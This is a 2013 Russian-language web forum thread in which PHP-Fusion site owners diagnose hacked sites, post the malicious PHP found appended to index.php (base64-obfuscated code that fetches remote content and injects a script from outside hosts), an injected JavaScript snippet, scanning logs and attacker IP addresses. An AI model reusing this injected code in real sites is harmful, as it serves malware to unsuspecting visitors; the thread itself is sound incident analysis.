Забыли пароль?
Запросите новый здесь.

Автор темы: Alex
ID темы: 1714
Информация:
Тема содержит 31 сообщения, была просмотрена 10307 раз.  Имеются прикрепленные файлы.
Просмотр темы
PHP-Fusion Russia » Поддержка 7 версии » Безопасность
 Распечатать тему
очередной взлом?
Alex
захожу сегодня на сайт и у меня сразу выскакивает окно расширения носкрипт типа заблокирован скрипт
скрин
linkme.ufanet.ru/images/1dc3a8354dcbbbd715734a0fc78f66aa.png

и в низу сайта вижу вот такое:
Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)

никакие скрипты мной не ставились.

далее иду на фтп и вижу что изменен файл index.php сразу заменяю его на хороший из бекапа, и все что описано выше пропадает.

очередной взлом?
 
Web
Alex
плохой файл индекс
Alex присоединено следующее:файл:
_.zip [2.67кБ / 290 Загрузки]
 
Web
Alex
хороший файл индекс
Alex присоединено следующее:файл:
index.zip [2.31кБ / 249 Загрузки]
 
Web
Alex
сравнив оба файла в конце нашел вот такой код

Скачать исходники  Код
function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

      if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
      $ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
      $file = @fopen ($get, "r");
      $content = @fread($file, 1000);
      @setcookie("iJijkdaMnerys", $value, time()+3600*24);
      if (!$content)
         echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY2NvdW50dXMuZ2V0cy1pdC5uZXQvZ29vZ2xlc3RhdC5waHAiPjwvc2NyaXB0Pg==");
      else
         echo $content;

      }
}
collectnewss ();


 
Web
Alex
на одном сайте только такое из 17 сайтов на аккаунте
 
Web
Rush
http://xxxporno.xxuz.com:888/move.php?ip= - отсюда из файла что-то считывается. второй base64 что-от не раскодился.
 
Web
Alex
я был не прав что такое тока на одном сайте, такой код нашел на всех стартовых страницах фьюженовских сайтах которые у меня на бегете
 
Web
Pisatel
Версия фьюжн? Стоят ли старые версии фьюжн?
 
Web
kosmozone
Двиг v7.02.07. На 2 сайтах, взлом через фтп (код добавлен в конец файла). Затронутые файлы по 1 сайту в ататче.

Скачать исходники  Код
<script type=\"text/javascript\" language=\"javascript\" >                                                                                                       function srcc() { var wcsb = document.createElement('script'); wcsb.src = 'http://mail.ru'; if (!document.getElementById('wcsb')) { document.write('<div id=\'wcsb\'></div>'); document.getElementById('wcsb').appendChild(wcsb); }}";


kosmozone присоединено следующее:изображение:
files.jpg
 
Web
Serge Renard
Блин, объясните мне, что такое «взлом по FTP» и как он возможен? Вы пароли в клиентах, что ли, храните?
В Интернете кто-то неправ!
 
Web
Pisatel
У меня, вроде, все нормально. Сейчас изучаю логи.
 
Web
Alex
11 фьюженов
5 вордпрессов
1 джумла

минимальная версия фьюженов 7,02,06

на всех 17 сайтах изменена страница index.php , последствия для фьюженов привел выше, последствия для вп сайты перестали работать, пока не удалил код была белая страница
 
Web
kosmozone
Пароли в клиентах не храню по умолчанию. Хостер говорит - вирусы, проверил комп, не нашел.
 
Web
Pisatel
Ну как бэ может это и не фьюжн, может жомла... http://asu-cs.donntu.edu.ua/ru/staffmen?p_id=24
Банально вбил кусок кода в поиск- куча сайтов на жомле и вп...
Изменил(а) Pisatel, 12.08.2013 09:38
 
Web
Alex
все сайты пострадали на аккаунте в рбк
 
Web
Pisatel
Пока через поиск одни вордпрессы попадаются с аналогичным кодом. Код чуть отличается: где-то eval присутствует... Забавно.
 
Web
Alex
по логам он долбился по всем фтп аккаунтам пароли подбирал, первый файл был загружен на фьюженовский сайт.

37.1.217.121 вот айпи взломщика
 
Web
Pisatel
Ко мне тоже стучались. Статистика 404 ошибок. Ип, правда, другой
Скачать исходники  Код
404
/admin/mysql-admin/main.php
11 August 2013 22:23:52 87.98.217.14

404
/admin/phpmyadmin2/main.php
11 August 2013 22:23:52 87.98.217.14

404
/admin/php-my-admin/main.php
11 August 2013 22:23:52 87.98.217.14

404
/admin/padmin/main.php
11 August 2013 22:23:52 87.98.217.14

404
/admin/datenbank/main.php
11 August 2013 22:23:52 87.98.217.14

404
/admin/database/main.php
11 August 2013 22:23:52 87.98.217.14

404
/phpmyadmin/main.php
11 August 2013 22:23:52 87.98.217.14

404
/phpMyAdmin/main.php
11 August 2013 22:23:52 87.98.217.14

404
/db/main.php
11 August 2013 22:23:52 87.98.217.14

404
/web/main.php
11 August 2013 22:23:52 87.98.217.14

404
/PMA/main.php
11 August 2013 22:23:52 87.98.217.14

404
/admin/main.php
11 August 2013 22:23:52 87.98.217.14

404
/mysql/main.php
11 August 2013 22:23:52 87.98.217.14

404
/admin/phpmyadmin/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/phpMyAdmin/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/sysadmin/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/sqladmin/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/db/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/web/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/pMA/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/mysql/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/myadmin/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/webadmin/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/sqlweb/main.php
11 August 2013 22:23:51 87.98.217.14

404
/admin/websql/main.php
11 August 2013 22:23:51 87.98.217.14


 
Web
kosmozone
По логам фтп, ломали с этих адресов

176.9.116.34
62.219.58.10
 
Web
GMan1990
Ни чего удивительного))) Мне хостер присылал уведомления:
4 августа, 3:01


Здравствуйте!

Вы получили данное письмо, так как являетесь активным клиентом хостинга Шнайдер-хост. Сообщаем, что в данный момент серверы хостинга продолжают (в том числе и Ваш) подвергаться массовой брутфорс атаке (подбор паролей методом грубой силы). Конкретно страдают сайты с движками Joomla, Wordpress и Datalife. Идет массированая атака на сайты под управлением данных CMS.

Стали появляться новости в сети, об атаках, многие хостеры подвержены. Например ссылки:

http://www.provisov.net/blog/2013/08/%D0%B7%D0%B0%D1%84%D0%B8%D0%BA%D1%81%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B0-%D0%BC%D0%B0%D1%81%D1%81%D0%BE%D0%B2%D0%B0%D1%8F-%D0%B0%D1%82%D0%B0%D0%BA%D0%B0-wordpress-%D0%B1%D0%BB%D0%BE%D0%B3%D0%BE/
http://www.opennet.ru/opennews/art.shtml?num=36689
http://1hosting.livejournal.com/21954.html

Вот

форум, где обсуждается текущая проблема:

http://www.cy-pr.com/forum/f23/t53996/m590692#message590692

Аналогичные новости поступают от хостеров и различных площадок.

Для сохранения доступности и работоспособности сайтов на хостинге, мы были вынуждены временно ограничить доступ к файлам администратора джумлы (administrator/index.php), Wordpress (wp-login.php) и dle(admin.php). Просим прощения за все неудобства, но не все вещи подвластны контролю.

Пока длительность атаки насчитывает уже 50 часов. Она то слабеет, то становится сильнее. Сейчас она снова усилилась. Поэтому вынуждены были опять заблокировать админки (они были разблокированы позавчера). Сколько она будет продолжаться - неизвестно, но думаем осталось недолго, учитывая ее масштабы. Мы вернем доступ в админки как только атака пройдет или ослабнет снова. Если Вам очень нужен доступ в админку, и Вы никак не можете подождать - обратитесь в нашу техническую поддержку, и мы постараемся включить админку конкретно для Вас.

Мы преодолеем эту проблему вместе. С уважением и любовью, Ваш Шнайдер-хост.

Человек
 
Web

Поделиться этой темой
Социальные закладки: Vkontakte Odnoklassniki Mail.ru Facebook Google Tweet This
URL:
BBcode:
HTML:

Перейти на форум:
Похожие темы
Темы Форум Ответов / Просмотров Последние сообщения
Взлом  →  Безопасность 18 / 10619 10.12.2015 16:02
Взлом сайта  →  Ошибки, баги 10 / 9921 09.04.2013 08:15
Топ 5 пользователей форума
Alex Alex (1,171)   Zaxap Zaxap (1,078)   Vova Vova (877)   Pisatel Pisatel (678)   util util (666)